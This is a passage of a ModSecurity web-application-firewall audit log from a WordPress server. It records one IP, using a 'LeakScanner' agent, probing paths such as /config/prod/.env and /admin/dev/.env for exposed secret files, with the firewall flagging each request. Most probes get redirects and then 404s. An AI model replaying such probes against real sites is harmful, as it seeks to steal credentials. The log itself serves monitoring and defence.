Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/config/dev/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --3a02a163-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/config/dev/.env"] [unique_id "aE6csjQchg8T7fp9tjNt5AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982386446694 641882 (- - -) Stopwatch2: 1749982386446694 641882; combined=1664, p1=353, p2=1203, p3=0, p4=0, p5=108, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a02a163-Z-- --09f94348-A-- [15/Jun/2025:15:43:08.895333 +0530] aE6cs315LOn2YRwTZIgCjQAAAAc 83.217.210.41 51924 127.0.0.1 7081 --09f94348-B-- GET /config/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//config/dev/.env accept-encoding: gzip --09f94348-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --09f94348-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/config/dev/.env"] [unique_id "aE6cs315LOn2YRwTZIgCjQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982387648123 1247272 (- - -) Stopwatch2: 1749982387648123 1247272; combined=1781, p1=415, p2=1272, p3=0, p4=0, p5=93, sr=145, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09f94348-Z-- --c31ec84e-A-- [15/Jun/2025:15:43:09.409909 +0530] aE6ctDQchg8T7fp9tjNt5QAAAAI 83.217.210.41 51970 127.0.0.1 7081 --c31ec84e-B-- GET //config/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --c31ec84e-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/config/prod/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c31ec84e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/config/prod/.env"] [unique_id "aE6ctDQchg8T7fp9tjNt5QAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982388804542 605456 (- - -) Stopwatch2: 1749982388804542 605456; combined=2282, p1=447, p2=1725, p3=0, p4=0, p5=110, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c31ec84e-Z-- --38dd6e41-A-- [15/Jun/2025:15:43:11.168577 +0530] aE6ctTS8xKUOR1xBR5bgcAAAAAM 83.217.210.41 33704 127.0.0.1 7081 --38dd6e41-B-- GET /config/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//config/prod/.env accept-encoding: gzip --38dd6e41-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --38dd6e41-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/config/prod/.env"] [unique_id "aE6ctTS8xKUOR1xBR5bgcAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982389924775 1243886 (- - -) Stopwatch2: 1749982389924775 1243886; combined=1900, p1=373, p2=1379, p3=0, p4=0, p5=148, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38dd6e41-Z-- --aa8b6936-A-- [15/Jun/2025:15:43:11.766364 +0530] aE6ctw9BijgXpeeI_r-2bwAAAAE 83.217.210.41 33788 127.0.0.1 7081 --aa8b6936-B-- GET //env/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --aa8b6936-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/env/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --aa8b6936-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/.env"] [unique_id "aE6ctw9BijgXpeeI_r-2bwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982391155429 611009 (- - -) Stopwatch2: 1749982391155429 611009; combined=1841, p1=380, p2=1373, p3=0, p4=0, p5=87, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aa8b6936-Z-- --c979bd59-A-- [15/Jun/2025:15:43:13.575044 +0530] aE6cuH15LOn2YRwTZIgCjwAAAAc 83.217.210.41 33832 127.0.0.1 7081 --c979bd59-B-- GET /env/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: https://arch.cstechns.com//env/.env user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --c979bd59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c979bd59-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/.env"] [unique_id "aE6cuH15LOn2YRwTZIgCjwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982392342765 1232360 (- - -) Stopwatch2: 1749982392342765 1232360; combined=1696, p1=364, p2=1241, p3=0, p4=0, p5=91, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c979bd59-Z-- --29f8f72c-A-- [15/Jun/2025:15:43:14.202325 +0530] aE6cuTr2XEdSo0rTaLVmkQAAAAg 83.217.210.41 33876 127.0.0.1 7081 --29f8f72c-B-- GET //env/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --29f8f72c-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/env/dev/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --29f8f72c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/dev/.env"] [unique_id "aE6cuTr2XEdSo0rTaLVmkQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982393567949 634439 (- - -) Stopwatch2: 1749982393567949 634439; combined=2084, p1=449, p2=1556, p3=0, p4=0, p5=79, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --29f8f72c-Z-- --df278179-A-- [15/Jun/2025:15:43:16.015787 +0530] aE6cuuvhFIArpJWr_ioNtgAAAAU 83.217.210.41 34016 127.0.0.1 7081 --df278179-B-- GET /env/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//env/dev/.env accept-encoding: gzip --df278179-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --df278179-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/dev/.env"] [unique_id "aE6cuuvhFIArpJWr_ioNtgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982394798467 1217383 (- - -) Stopwatch2: 1749982394798467 1217383; combined=1693, p1=417, p2=1171, p3=0, p4=0, p5=104, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df278179-Z-- --1e3b0b26-A-- [15/Jun/2025:15:43:16.563017 +0530] aE6cu315LOn2YRwTZIgClgAAAAc 83.217.210.41 34288 127.0.0.1 7081 --1e3b0b26-B-- GET //env/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --1e3b0b26-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/env/prod/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --1e3b0b26-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/prod/.env"] [unique_id "aE6cu315LOn2YRwTZIgClgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982395985155 577953 (- - -) Stopwatch2: 1749982395985155 577953; combined=2203, p1=479, p2=1613, p3=0, p4=0, p5=110, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e3b0b26-Z-- --6250220d-A-- [15/Jun/2025:15:43:18.668561 +0530] aE6cvVirsA1ruSKrNWSMJgAAAAQ 83.217.210.41 34332 127.0.0.1 7081 --6250220d-B-- GET /env/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//env/prod/.env accept-encoding: gzip --6250220d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --6250220d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/prod/.env"] [unique_id "aE6cvVirsA1ruSKrNWSMJgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982397314647 1354024 (- - -) Stopwatch2: 1749982397314647 1354024; combined=1863, p1=374, p2=1335, p3=0, p4=0, p5=153, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6250220d-Z-- --ab708f3a-A-- [15/Jun/2025:15:43:19.112618 +0530] aE6cvsZRGs9Zs5Qd_koWCQAAAAA 83.217.210.41 34418 127.0.0.1 7081 --ab708f3a-B-- GET //env/test/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --ab708f3a-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/env/test/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --ab708f3a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/test/.env"] [unique_id "aE6cvsZRGs9Zs5Qd_koWCQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982398512664 600030 (- - -) Stopwatch2: 1749982398512664 600030; combined=1641, p1=346, p2=1196, p3=0, p4=0, p5=98, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab708f3a-Z-- --d73f8f04-A-- [15/Jun/2025:15:43:20.841289 +0530] aE6cvxRnvL96XFagPFCv5wAAAAY 83.217.210.41 50136 127.0.0.1 7081 --d73f8f04-B-- GET /env/test/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//env/test/.env accept-encoding: gzip --d73f8f04-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d73f8f04-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/env/test/.env"] [unique_id "aE6cvxRnvL96XFagPFCv5wAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982399588705 1252646 (- - -) Stopwatch2: 1749982399588705 1252646; combined=1701, p1=337, p2=1268, p3=0, p4=0, p5=95, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d73f8f04-Z-- --a1748b31-A-- [15/Jun/2025:15:43:21.262640 +0530] aE6cwDS8xKUOR1xBR5bgegAAAAM 83.217.210.41 50202 127.0.0.1 7081 --a1748b31-B-- GET //admin/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --a1748b31-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/admin/dev/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --a1748b31-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/dev/.env"] [unique_id "aE6cwDS8xKUOR1xBR5bgegAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982400672781 589935 (- - -) Stopwatch2: 1749982400672781 589935; combined=1881, p1=380, p2=1388, p3=0, p4=0, p5=112, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1748b31-Z-- --6cd1ad43-A-- [15/Jun/2025:15:43:23.133899 +0530] aE6cwcZRGs9Zs5Qd_koWDAAAAAA 83.217.210.41 50270 127.0.0.1 7081 --6cd1ad43-B-- GET /admin/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//admin/dev/.env accept-encoding: gzip --6cd1ad43-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --6cd1ad43-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/dev/.env"] [unique_id "aE6cwcZRGs9Zs5Qd_koWDAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982401845426 1288538 (- - -) Stopwatch2: 1749982401845426 1288538; combined=2121, p1=448, p2=1510, p3=0, p4=0, p5=162, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6cd1ad43-Z-- --d0c12729-A-- [15/Jun/2025:15:43:23.762158 +0530] aE6cwxRnvL96XFagPFCv6QAAAAY 83.217.210.41 50340 127.0.0.1 7081 --d0c12729-B-- GET //admin/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --d0c12729-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/admin/prod/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --d0c12729-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/prod/.env"] [unique_id "aE6cwxRnvL96XFagPFCv6QAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982403086076 676145 (- - -) Stopwatch2: 1749982403086076 676145; combined=1740, p1=362, p2=1289, p3=0, p4=0, p5=88, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0c12729-Z-- --942e4972-A-- [15/Jun/2025:15:43:25.577986 +0530] aE6cxFirsA1ruSKrNWSMKQAAAAQ 83.217.210.41 50416 127.0.0.1 7081 --942e4972-B-- GET /admin/prod/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//admin/prod/.env accept-encoding: gzip --942e4972-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --942e4972-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/admin/prod/.env"] [unique_id "aE6cxFirsA1ruSKrNWSMKQAAAAQ"] Apache-Handler: 